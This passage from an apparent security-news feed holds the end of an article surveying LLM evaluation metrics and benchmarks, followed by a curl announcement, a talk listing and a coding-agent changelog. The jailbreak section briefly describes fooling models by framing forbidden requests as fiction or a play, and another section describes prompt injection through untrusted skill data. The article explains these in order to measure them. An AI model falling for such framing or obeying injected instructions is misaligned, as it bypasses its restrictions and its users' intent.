<p>Many models have numbers in their name followed by a B. This is meant to roughly capture the number of parameters, or the number of variables the model uses to generate outputs from inputs. The number “70B” means that there are about 70 billion parameters in the model. This is a good estimate for the complexity of the model and the size of the training set that has been stuffed into it. Generally bigger numbers mean a larger amount of information is hiding inside the model. It often means that it will take a bigger GPU with more RAM to generate an answer with it. It’s not a very precise number, though, because there are many other areas of the architecture that can influence whether the model can generate the answer you want inside your budget. There continue to be advances and it’s not uncommon for someone to claim that a new model with X parameters is better than an old model with 2X or 3X parameters.</p>



<h2 class="wp-block-heading">Hallucination rate</h2>



<p>While everyone wants LLMs to generate accurate output, measuring it can be difficult because deciding what’s accurate is sometimes complicated. One approach is to ask the LLM to summarize a document. Then another model evaluates how well the summary matches the original. While this may not catch all subtle slips, it will capture enough of the worst departures from reality. Some researchers have built complex test sets with curated answers. The LLMs that deliver the expected answers get the highest scores. Some common benchmarks are <a href="https://github.com/sylinrl/TruthfulQA">TruthfulQA</a>, <a href="https://arxiv.org/abs/2305.11747">HaluEval</a>, <a href="https://github.com/salesforce/QAFactEval">QAFactEval</a>, and Vectara’s <a href="https://github.com/vectara/hallucination-leaderboard">Hallucination Evaluation Model</a> (HHEM).</p>



<h2 class="wp-block-heading">Toxicity and bias scores</h2>



<p>If measuring accuracy is difficult, building a metric to detect toxic or biased output is even more challenging because the definitions can be so protean. Still, some teams have built LLMs that key on particular concepts or word choices. They can detect some of the most obvious red flags that could generate political trouble. Some well-known versions include <a href="https://www.granica.ai/blog/granica-launches-ai-data-safety-solution-granica-screen-on-aws-marketplace">Granica Screen</a> and <a href="https://perspectiveapi.com/">Perspective API</a>.</p>



<h2 class="wp-block-heading">PII leakage</h2>



<p>One of the biggest fears is that LLMs will somehow absorb information that may be considered personal and private. Some of the simplest measures can be as simple as regular expressions that look for the sixteen digit numbers used for credit card transactions. Many of the model builders work on eliminating personally identifiable information (PII) from the training set before beginning.</p>



<h2 class="wp-block-heading">Tool-calling accuracy</h2>



<p>As models grow more complex and agentic, they often gain access to various tools or <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) gateways that can help them find the best answers. Not all models take advantage of this help. The tool-calling accuracy scores count how often the models choose the best tool for the job. One particular example of this measurement is <a href="https://gorilla.cs.berkeley.edu/leaderboard.html">BFCL</a> (Berkeley Function Calling Leaderboard).</p>



<h2 class="wp-block-heading">Prompt sensitivity</h2>



<p>The value captures how small changes in the language of the prompt induces the model to produce different results. It’s like a derivative from calculus class, although it’s generally computed experimentally using some collection of test prompts. There are a number of different approaches that depend upon different types of changes. Some test sets are built with small rephrasing of the request that are semantically the same. Others mix together different ways of specifying the problem, some with examples, say, and some without. Some specific examples include <a href="https://arxiv.org/html/2509.13680">PromptSE</a> and <a href="https://arxiv.org/abs/2410.12405">ProSA</a>.</p>



<h2 class="wp-block-heading">Semantic similarity and conciseness</h2>



<p>Some metrics evaluate the answers by comparing them to a set of gold standard answers. This often involves feeding them to a <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">vector embedding</a> model and searching a <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html" data-type="link" data-id="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation</a> (RAG) database for similar answers. This can track how concise or fluffy the answers might be as well as looking for how much variability might be introduced through changing parameters like the temperature. One common example is the <a href="https://bertscore.com/">BERTScore</a>.</p>



<h2 class="wp-block-heading">Grounding score</h2>



<p>Many systems that combine an LLM with a vector search tool for RAG measure the effectiveness of the combination with a benchmark like the grounding score. The LLM is presented with extra data from the vector search and the benchmark measures how closely it follows this extra information. That is, how much of the answer comes from the provided source documents and how much is synthesized using the data in its training set. Some examples include <a href="https://aclanthology.org/2024.eacl-demo.16/">RAGAS</a>, <a href="https://www.trulens.org/">TruLens</a>, <a href="https://ares-ai.vercel.app/">ARES</a> (Automated RAG Evaluation System), <a href="https://github.com/chen700564/RGB">RGB</a> (Retrieval-Augmented Generation Benchmark), <a href="https://arxiv.org/abs/2305.11747">HaluEval</a>, and <a href="https://halluhard.com/">HalluHard</a>. A similar concept is called “context adherence,” “context precision,” “context recall,” or “faithfulness.”</p>



<h2 class="wp-block-heading">Model variability</h2>



<p>Most LLMs fold in a certain amount of random entropy, and this amount is often controlled by a parameter called the “temperature.” The model variability is a measure of how much the answers will change between runs. Some applications like chatbots require a certain amount of variability because the randomness adds a bit of “life” to the answers. Other applications like those in mission-critical areas like law or medicine will undermine confidence if the answers vary.</p>



<h2 class="wp-block-heading">Format compliance rate</h2>



<p>In some roles, LLMs are asked to produce data in strict formats like JSON or CSV. This is often important if the data will be fed into some pipeline for further processing or storage. The format compliance rate tests a number of common formats and measures how often the LLM returns semantically correct data. Agentic systems that glue together multiple LLMs and other tools rely heavily on LLMs with good scores on this benchmark.</p>



<h2 class="wp-block-heading">Instruction following</h2>



<p>Some prompts include very specific instructions and the adherence can be measured empirically. For example, some prompts will ask the LLM to produce exactly 300 words or a poem in rhyming couplets. These tests use a collection of sample prompts that ask for answers that can be easily measured. Some specific examples include <a href="https://arxiv.org/abs/2311.07911">IFEval</a>, <a href="https://github.com/YJiangcm/FollowBench">FollowBench</a>, and the <a href="https://gorilla.cs.berkeley.edu/leaderboard.html">BFCL</a> (Berkeley Function Calling Leaderboard), a value that is mentioned above in the section on tool usage.   </p>



<h2 class="wp-block-heading">Subgoal success rate</h2>



<p>As agentic models become more common, it’s helpful to track how well the model performs on each of the various parts of the agent’s strategic plan. All of the metrics here can be broken down and tracked for each of the subgoals.</p>



<h2 class="wp-block-heading">Plan stability</h2>



<p>Agentic models start with a plan. Some of them are smart enough to abandon the plan or at least adjust it as the work evolves. Plan stability measures how often the plans are adjusted. A high rate of adjustment could mean that the agent is a bad planner or just flexible or maybe both.</p>



<h2 class="wp-block-heading">Self-correction score</h2>



<p>Some agents are able to dive deeper and recognize their mistakes. The self-correction score measures how often the model will make a mistake and then recognize it, either on its own or after being prompted with the question, “Are you really sure?”</p>



<h2 class="wp-block-heading">Jailbreak resistance</h2>



<p>Some users try to find clever ways to lure the LLM into tossing aside any restrictions on topics or answers. In the past, some LLMs could be fooled by being told the answer was part of a play or a work of fiction. So discussing forbidden subjects wasn’t a problem because it was all pretend. Newer models have more elaborate defenses. Measures of the ability to resist deception include <a href="https://jailbreakbench.github.io/">JailbreakBench</a>, <a href="https://arxiv.org/abs/2410.09024">AgentHarm</a>, and <a href="https://arxiv.org/pdf/2512.05485">Tele-AI-Safety</a>. </p>



<h2 class="wp-block-heading">Prompt injection vulnerability</h2>



<p>Sometimes untrusted data from extra sources or skills may include malicious instructions that can exploit the LLM. Benchmarks such as <a href="https://arxiv.org/abs/2602.20156">Skill-Inject</a> and <a href="https://spikee.ai/">SPIKEE</a> (Simple Prompt Injection Kit for Evaluation and Exploitation) work with known attack vectors and measure how susceptible a model is to targeted prompt injection attacks. </p>



<h2 class="wp-block-heading">Copyright infringement score </h2>



<p>Some LLMs can regurgitate the data in their training corpus in a way that seems like plagiarism or copyright infringement. This can be an issue when the training material wasn’t carefully licensed. The copyright infringement score measures how often the LLM may parrot the training material a bit too closely. Tools for defending against this include <a href="https://www.patronus.ai/blog/introducing-copyright-catcher">CopyrightCatcher</a> and <a href="https://arxiv.org/abs/2402.09910">DE-COP</a>. </p>



<h2 class="wp-block-heading">RULER</h2>



<p>How well can a model extract information from the entire context? <a href="https://github.com/gkamradt/needle-in-a-haystack" data-type="link" data-id="https://github.com/gkamradt/needle-in-a-haystack">NIAH</a> (needle-in-a haystack) <a href="https://arxiv.org/pdf/2504.04713" data-type="link" data-id="https://arxiv.org/pdf/2504.04713">benchmarks</a> measure how well a model can retrieve small, crucial bits of information from long contexts. <a href="https://github.com/NVIDIA/RULER">RULER</a> takes NIAH tests further with the ability to vary the types and quantities of needles, the size of the haystack, and the complexity of the task. </p>



<h2 class="wp-block-heading">GSM8K </h2>



<p>The developers of <a href="https://arxiv.org/abs/2110.14168" data-type="link" data-id="https://arxiv.org/abs/2110.14168">GSM8K</a> (Grade School Math 8K) set out to benchmark an LLM’s ability to tackle multistep mathematical problems, so they gathered <a href="https://huggingface.co/datasets/openai/gsm8k">8,500 problems</a> that are common in grade school math classes. While the focus is explicitly on solving math homework problems, the benchmark also measures the ability to construct reasoning chains.</p>



<h2 class="wp-block-heading">GPQA</h2>



<p>The <a href="https://arxiv.org/pdf/2311.12022">Graduate-Level Google-Proof Q&amp;A</a> is composed of hundreds of hard questions that might normally be answered by humans in graduate school, generally in science. To make the benchmark harder, the researchers focused on questions that non-experts often get wrong. The term “Google-proof” means that the benchmark includes questions that can’t be easily answered by asking a search engine.</p>



<h2 class="wp-block-heading">MMLU-Pro</h2>



<p>The <a href="https://github.com/TIGER-AI-Lab/MMLU-Pro" data-type="link" data-id="https://github.com/TIGER-AI-Lab/MMLU-Pro">MMLU-Pro</a> benchmark builds on the Massive Multitask Language Understanding dataset to test a model’s understanding of a broad set of scientific knowledge. It includes more than 12,000 questions about general scientific fields like biology, chemistry, economics, and law. </p>



<h2 class="wp-block-heading">MBPP</h2>



<p>Google created <a href="https://github.com/google-research/google-research/tree/master/mbpp">MBPP</a> (Mostly Basic Python Problems) to evaluate how well a model was solving coding questions. Each problem comes with a statement, a gold standard solution, and several similar test cases. The number of accurate answers to these questions is a good measure of how well the model will solve many of the simpler Python coding problems presented by users.</p>



<h2 class="wp-block-heading">SWE-bench</h2>



<p>This <a href="https://github.com/SWE-bench/SWE-bench">collection</a> of several thousand software engineering challenges evaluates how well a model solves programming problems. The developers created it by selecting a number of issues and corresponding pull-requests from a dozen or so Python projects. After some limitations appeared, the creators expanded the set by creating <a href="https://arxiv.org/abs/2410.06992" data-type="link" data-id="https://arxiv.org/abs/2410.06992">SWE-Bench+</a>, <a href="https://openai.com/index/introducing-swe-bench-verified/">SWE Bench Verified</a>, and <a href="https://arxiv.org/abs/2509.16941" data-type="link" data-id="https://arxiv.org/abs/2509.16941">SWE-Bench Pro</a>.</p>



<h2 class="wp-block-heading">LMSYS Chatbot Arena</h2>



<p>Instead of creating a fixed set of test prompts, the Large Model Systems Organization’s <a href="https://www.lmsys.org/" data-type="link" data-id="https://www.lmsys.org/">Chatbot Arena</a> is a dynamic system that feeds the same prompt to different models and then asks humans to pick the best results. These head-to-head contests produce an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo</a>-like rating that is similar to the one used to score chess players.</p>



<h2 class="wp-block-heading">Price</h2>



<p>The rest of these metrics are useful, but as the real estate agents say, the three most important numbers on a property listing are price, price, and price. The cost is a bit less important for measuring AIs, but only a bit. Price can make a huge difference between a project being profitable and a moneysink. When the cost for each inference is a tad too high, it’s impossible to make it up with volume.</p>



<p>The key caveat is that a cheaper model isn’t a good idea if it generates answers that are filled with hallucinations or worse. The quality of the answers can differ greatly, and saving a few pennies can be a mistake. To make matters more complicated, there’s an explosion in different styles and approaches. Sometimes it makes sense to pay a bit more for a model that delivers answers with the right vibe.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[curl summer of bliss]]></title>
<description><![CDATA[The curl project will not accept or otherwise handle any vulnerability reports during the month of July 2026. We call it the curl summer of bliss. curl’s submission form on Hackerone will be paused starting July 1, 2026. Summer of bliss starts: July 1, 2026. 00:00 CEST Submissions resume: August ...]]></description>
<link>https://tsecurity.de/de/3598216/tools/curl-summer-of-bliss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598216/tools/curl-summer-of-bliss/</guid>
<pubDate>Mon, 15 Jun 2026 08:24:18 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The curl project will not accept or otherwise handle any vulnerability reports during the month of July 2026. We call it the curl summer of bliss. curl’s submission form on Hackerone will be paused starting July 1, 2026. Summer of bliss starts: July 1, 2026. 00:00 CEST Submissions resume: August 3 2026. 09:00 CEST The … <a href="https://daniel.haxx.se/blog/2026/06/15/curl-summer-of-bliss/" class="more-link">Continue reading <span class="screen-reader-text">curl summer of bliss</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inklusion bei Digitalen Projekten (tdf2026)]]></title>
<description><![CDATA[Gerade bei Opensource Projekten wird die Inklusion und die barrierefreiheit oftmals vernachlässigt. Ich möchte hier Tipps geben wie man die barrierefreiheit mit einfachen Mitteln verbessern kann.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://...]]></description>
<link>https://tsecurity.de/de/3597153/it-security-video/inklusion-bei-digitalen-projekten-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597153/it-security-video/inklusion-bei-digitalen-projekten-tdf2026/</guid>
<pubDate>Sun, 14 Jun 2026 15:47:53 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gerade bei Opensource Projekten wird die Inklusion und die barrierefreiheit oftmals vernachlässigt. Ich möchte hier Tipps geben wie man die barrierefreiheit mit einfachen Mitteln verbessern kann.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/AA8XA3/]]></content:encoded>
</item>
<item>
<title><![CDATA[TDF 2026 - Inklusion bei Digitalen Projekten]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 0x - Views:4 https://media.ccc.de/v/tdf5-205-inklusion-bei-digitalen-projekten

Gerade bei Opensource Projekten wird die Inklusion und die barrierefreiheit oftmals vernachlässigt. Ich möchte hier Tipps geben wie man die barrierefreiheit mit einfachen Mitteln verb...]]></description>
<link>https://tsecurity.de/de/3597150/it-security-video/tdf-2026-inklusion-bei-digitalen-projekten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597150/it-security-video/tdf-2026-inklusion-bei-digitalen-projekten/</guid>
<pubDate>Sun, 14 Jun 2026 15:47:49 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tbrmiiETYlQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/tdf5-205-inklusion-bei-digitalen-projekten<br />
<br />
Gerade bei Opensource Projekten wird die Inklusion und die barrierefreiheit oftmals vernachlässigt. Ich möchte hier Tipps geben wie man die barrierefreiheit mit einfachen Mitteln verbessern kann.<br />
<br />
Borys Sobieski<br />
<br />
https://cfp.cttue.de/tdf5/talk/AA8XA3/<br />
<br />
#tdf2026 #DigitalLiteracyandEmpowerment<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.12.4]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Fixed

Fixed remote compaction input trimming to use unlimited context when model.contextWindow is unset

@oh-my-pi/pi-ai
Added

Added GITLAB_CLIENT_ID and GITLAB_REDIRECT_URI env-var overrides for the GitLab Duo OAuth login flow so users running with their own GitLab OAut...]]></description>
<link>https://tsecurity.de/de/3595882/tools/v15124/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595882/tools/v15124/</guid>
<pubDate>Sat, 13 Jun 2026 18:24:20 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed remote compaction input trimming to use unlimited context when <code>model.contextWindow</code> is unset</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added <code>GITLAB_CLIENT_ID</code> and <code>GITLAB_REDIRECT_URI</code> env-var overrides for the GitLab Duo OAuth login flow so users running with their own GitLab OAuth application can replace the bundled credentials when GitLab rejects the bundled <code>client_id</code>'s redirect URI. Setting <code>GITLAB_REDIRECT_URI</code> also disables the random-port fallback (strict OAuth providers reject mismatched URIs anyway). (<a href="https://github.com/can1357/oh-my-pi/issues/2424" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2424/hovercard">#2424</a>)</li>
<li>Added <code>AuthStorage.listStoredCredentials()</code> and <code>AuthStorage.removeCredential()</code> for per-account credential management.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Replaced the OpenAI SDK client usage in <code>openai-completions</code>, <code>openai-responses</code>, <code>azure-openai-responses</code>, and <code>openai-codex-responses</code> with the new internal <code>postOpenAIStream</code> OpenAI-wire JSON/SSE transport</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed streaming providers to cancel upstream model requests when the client closes the response body, so interrupted SSE sessions stop instead of continuing in the background</li>
<li>Fixed: provider request builders treat unknown <code>model.maxTokens</code> (<code>null</code>) as "no model cap" instead of coercing to <code>0</code> via <code>Math.min</code>; Anthropic falls back to the 64k Claude-Code cap for its required <code>max_tokens</code>.</li>
<li>Fixed transient stream failures on OpenAI-compatible providers by retrying HTTP 408/429/5xx responses and transient network errors with Retry-After/quota-hint aware backoff</li>
<li>Fixed SSE stream handling for OpenAI-compatible responses by parsing wire-level JSON frames directly and honoring <code>[DONE]</code> termination</li>
<li>Fixed stream error handling for OpenAI-compatible providers by preserving structured HTTP status/headers and response body details from failed requests for retry and strict-tool fallback logic</li>
<li>Fixed OpenAI-compat streams ending with a bare <code>finish_reason: "error"</code> (gateways like OpenRouter reporting upstream failures, e.g. Gemini <code>MALFORMED_FUNCTION_CALL</code>) surfacing as a non-retryable <code>Provider finish_reason: error</code>. The reason is now mapped to <code>Provider returned error finish_reason</code>, which the session retry classifier recognizes as transient, so the turn auto-retries instead of stopping with a pinned error banner.</li>
<li>Fixed <code>SqliteAuthCredentialStore.open()</code> crashing with <code>SQLITE_BUSY_RECOVERY</code> (errno 261) when several <code>omp --session</code> panes restore concurrently after an unclean shutdown: <code>PRAGMA busy_timeout = 5000</code> now runs as a standalone statement BEFORE <code>PRAGMA journal_mode=WAL</code> (the first lock-taking statement during WAL recovery), and <code>open()</code> retries the BUSY family — <code>SQLITE_BUSY</code>, <code>SQLITE_BUSY_RECOVERY</code>, <code>SQLITE_BUSY_SNAPSHOT</code>, <code>SQLITE_BUSY_TIMEOUT</code> — with bounded exponential backoff. The exhausted-retry error message includes the DB path. Exported <code>isSqliteBusyError(err)</code> for callers that need the same classifier (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
<li>Fixed MiniMax-M3 OpenAI-compatible streams rendering reasoning twice when the same chunk carried both <code>&lt;think&gt;…&lt;/think&gt;</code> content and structured <code>reasoning_content</code>; structured reasoning now wins and cumulative MiniMax reasoning snapshots are collapsed to deltas. (<a href="https://github.com/can1357/oh-my-pi/issues/2433" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2433/hovercard">#2433</a>)</li>
<li>Fixed Gemini turns silently halting the agent when the model returned <code>finishReason: STOP</code> with only an empty (or whitespace-only) text part and no tool call — the well-known "empty response" failure. All Google surfaces (public Generative Language <code>streamGoogle</code>, Vertex <code>streamGoogleVertex</code>, and Cloud Code Assist <code>google-gemini-cli</code>/<code>google-antigravity</code>) now classify such a turn as empty via the shared <code>hasMeaningfulGoogleContent</code> check and retry it up to <code>MAX_EMPTY_STREAM_RETRIES</code> times before surfacing an error. The Cloud Code Assist path previously had an empty-stream retry that never fired for this case (its <code>hasContent</code> flag counted an empty-string text part as content), and the public/Vertex path had no retry at all; the retry now emits a single <code>start</code> event so no duplicate partial message leaks downstream.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Added</h3>
<ul>
<li>Added bundled Fireworks models <code>deepseek-v4-flash</code>, <code>kimi-k2.7-code</code>, <code>minimax-m2.5</code>, <code>minimax-m3</code>, <code>nemotron-3-ultra-nvfp4</code>, <code>qwen3.6-plus</code>, and <code>qwen3.7-plus</code></li>
<li>Changed</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Model <code>contextWindow</code>/<code>maxTokens</code> are now <code>number | null</code>; discovery emits <code>null</code> when a provider reports no limit, replacing the <code>222222</code>/<code>8888</code> (<code>UNK_CONTEXT_WINDOW</code>/<code>UNK_MAX_TOKENS</code>) sentinels (now removed). Bundled <code>models.json</code> unknown limits are <code>null</code>.</li>
<li>Changed the <code>github-copilot</code> model context window to <code>524288</code> tokens</li>
<li>Changed Fireworks model discovery to source the control-plane <code>List Models</code> API (<code>GET /v1/accounts/fireworks/models?filter=supports_serverless=true</code>) instead of the OpenAI-compatible <code>/v1/models</code> inference listing. The inference endpoint returns a sparse, account-specific subset that omits on-demand serverless models (e.g. <code>kimi-k2.7-code</code>), so newly published serverless models stayed invisible in the picker until hand-added to the bundled catalog. The control-plane catalog enumerates every serverless model with capability metadata (<code>supportsServerless</code>/<code>supportsTools</code>/<code>supportsImageInput</code>/<code>contextLength</code>/<code>displayName</code>), paginated and filtered to tool-capable <code>READY</code> entries, then merged with bundled/models.dev references — the Kimi K2 max-output clamp and DeepSeek V4 thinking-toggle strip are preserved, and unbundled models default to reasoning so <code>buildModel</code> derives the Fireworks effort map. New serverless releases now surface automatically with no catalog edits.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Filled missing <code>contextWindow</code> and <code>maxTokens</code> in generated <code>models.json</code> for proxy/reseller variants by inheriting limits from canonical-family and segment-reference models</li>
<li>Ignored zero-cost <code>x-ai</code> subscription entries as reference sources when backfilling limits so inflated values are not propagated</li>
<li>Fixed the model cache opening with <code>PRAGMA journal_mode=WAL</code> before <code>PRAGMA busy_timeout</code>, so concurrent omp startups could crash inside <code>getDb()</code> on <code>SQLITE_BUSY</code> during WAL recovery instead of waiting through the transient lock. The busy handler is now installed before the first lock-taking statement (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the top-level <code>--list-models</code> flag path and migrated model listing to the new <code>omp models</code> command</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>omp models</code> command to list and manage models with <code>ls</code>, <code>find</code>, <code>canonical</code>, and <code>refresh</code> actions</li>
<li>Added <code>--json</code> output plus <code>-e/--extension</code>, <code>--no-extensions</code>, and <code>--config</code> controls to <code>omp models</code> listings</li>
<li>Added <code>skills.enableAgentsUser</code> and <code>skills.enableAgentsProject</code> settings (default on) so the canonical OMP-native <code>~/.agent[s]/skills</code> and project-walkup <code>.agent[s]/skills</code> are configurable independently from the third-party Claude/Codex/Pi toggles.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Model registry merge and <code>omp models</code> / model picker handle unknown context/output limits (<code>null</code>) — unknown limits render as <code>-</code> instead of a fake <code>222K</code>/<code>8.9K</code>.</li>
<li>Changed <code>omp models</code> to use cached provider data by default and require <code>omp models refresh</code> for a forced online re-fetch</li>
<li>Updated model-resolution errors to point to <code>omp models</code> when a provider or model is not found</li>
<li>Upgraded workspace catalog packages to their latest versions as of 3 days ago, and refactored the ACP agent implementation to be compatible with <code>@agentclientprotocol/sdk</code> version <code>0.25.0</code>.</li>
<li>Made the <code>zod</code> version requirement in the workspace catalog more tolerant (<code>^4.0.0</code> instead of <code>4.4.3</code>), and aligned type definitions in coding-agent extensibility modules.</li>
<li>Changed <code>/logout</code> to pick a stored account after the provider, so multi-account OAuth providers can remove one credential without logging out every account.</li>
<li>Changed the status-line context% to report the provider's real prompt-token count — anchored on the last assistant response, matching the <code>/context</code> panel and the collab host broadcast — instead of an independent cl100k estimate of the whole conversation. The estimate could read several points high and climb past 100% on subscription/Codex models (whose advertised window, e.g. <code>272K</code>, is already the input budget after reserving max output) while the request was still well within the real limit. Right after compaction the segment now shows <code>?</code> until the next response re-establishes the true count, and the redundant per-message estimate cache was dropped in favor of memoizing <code>getContextUsage()</code>.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed ACP thinking-delta mapping to tolerate live chunks that only carry delta text.</li>
<li>Fixed image input to Ollama (local <code>ollama</code>, <code>ollama-cloud</code>, and any <code>ollama-chat</code> model) failing with an opaque HTTP 400 when an attached image was encoded as WebP. Ollama decodes images through llama.cpp / <code>stb_image</code>, which is built without WebP support, so the resize pipeline now auto-excludes WebP for those models — the automatic equivalent of <code>OMP_NO_WEBP=1</code>, applied across every image path (<code>@file</code> mentions and prompt/paste/CLI attachments, the <code>read</code>/<code>inspect_image</code> tools, <code>eval</code> display images, <code>fetch</code>ed images, and browser screenshots). Other providers are unaffected and still honor <code>OMP_NO_WEBP</code>.</li>
<li>Fixed queued steering/follow-up display to derive from the agent-core queue, so queued chips clear when the core dequeues them and no longer strand after empty-Enter aborts.</li>
<li>Fixed model auth gateway probing to avoid skipping candidates with unknown <code>maxTokens</code> limits (<code>null</code>)</li>
<li>Fixed model listings so providers registered via extensions are now included from <code>-e</code> and configured <code>extensions</code> sources</li>
<li>Fixed <code>/mcp reauth</code>, <code>/mcp test</code>, and <code>/mcp unauth</code> to find and operate on MCP servers reported by <code>/mcp list</code> even when they are only runtime-discovered and not stored in writable config, including namespaced plugin servers like <code>cloudflare:cloudflare-api</code></li>
<li>Fixed MCP server name validation so colon-namespaced server IDs are accepted when persisting reauth overrides so namespaced OAuth MCP servers can be stored in user config as <code>server:subserver</code> entries</li>
<li>Retried assistant turns that stop with reasoning/thinking only and no final text or tool call, so Gemini/Antigravity thought-only <code>STOP</code> responses continue instead of silently ending the session.</li>
<li>Fixed <code>~/.agent[s]/skills</code> not appearing as <code>/skill:&lt;name&gt;</code> commands when every named source toggle (<code>skills.enableCodexUser</code>, <code>skills.enableClaudeUser</code>, <code>skills.enableClaudeProject</code>, <code>skills.enablePiUser</code>, <code>skills.enablePiProject</code>) was off: <code>loadSkills</code> gated the <code>agents</code> provider on <code>anyBuiltInSkillSourceEnabled</code>, so a user who turned off the Claude/Codex/Pi sources to clean noise also lost their own canonical OMP-native skills. The <code>agents</code> provider now reads the dedicated <code>enableAgentsUser</code>/<code>enableAgentsProject</code> toggles, decoupled from the third-party fall-through (<a href="https://github.com/can1357/oh-my-pi/issues/2401" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2401/hovercard">#2401</a>).</li>
<li>Fixed Windows PowerShell image paste so Ctrl+V can fall back to the PowerShell clipboard bridge when the native clipboard reader reports no image (<a href="https://github.com/can1357/oh-my-pi/issues/2429" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2429/hovercard">#2429</a>).</li>
<li>Fixed misaligned box borders in Mermaid ASCII rendering for CJK (Korean/Japanese/Chinese) and emoji labels — affects both fenced <code>mermaid</code> code blocks in assistant messages and the <code>render_mermaid</code> tool. <code>beautiful-mermaid@1.1.3</code> measures label width in UTF-16 code units while terminals render East Asian characters 2 columns wide; a <code>patchedDependencies</code> entry rebuilds its ASCII renderer to measure terminal display columns (grapheme-cluster aware, wcwidth-style policy). The patch mirrors the upstream PR (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654741745" data-permission-text="Title is private" data-url="https://github.com/lukilabs/beautiful-mermaid/issues/128" data-hovercard-type="pull_request" data-hovercard-url="/lukilabs/beautiful-mermaid/pull/128/hovercard" href="https://github.com/lukilabs/beautiful-mermaid/pull/128">lukilabs/beautiful-mermaid#128</a>) and should be dropped once it ships in a release.</li>
<li>Fixed interrupt loader state getting stuck after queued-message aborts by removing the session-layer flush/latch path; empty Enter now aborts the active turn and lets the existing post-unwind queue drain resume normally.</li>
<li>Fixed <code>/goal &lt;objective&gt;</code> and <code>/goal set &lt;objective&gt;</code> during streaming so goal context is steered immediately but objective submission waits for the active turn to finish instead of spamming <code>AgentBusyError</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2454" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2454/hovercard">#2454</a>).</li>
<li>Fixed concurrent <code>omp --session</code> startups (e.g. cmux pane restore after an unclean shutdown) crashing with <code>SQLITE_BUSY_RECOVERY</code> while the agent SQLite databases were still under WAL recovery. The auth credential store and <code>AgentStorage.open()</code> retry the <code>SQLITE_BUSY</code> family with bounded backoff, and every shared SQLite open path (<code>AgentStorage</code>, history, autoresearch, memories, github cache, auto-QA grievances, catalog model cache, stats) now installs the busy handler before the first lock-taking statement so transient WAL recovery contention waits instead of crashing (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
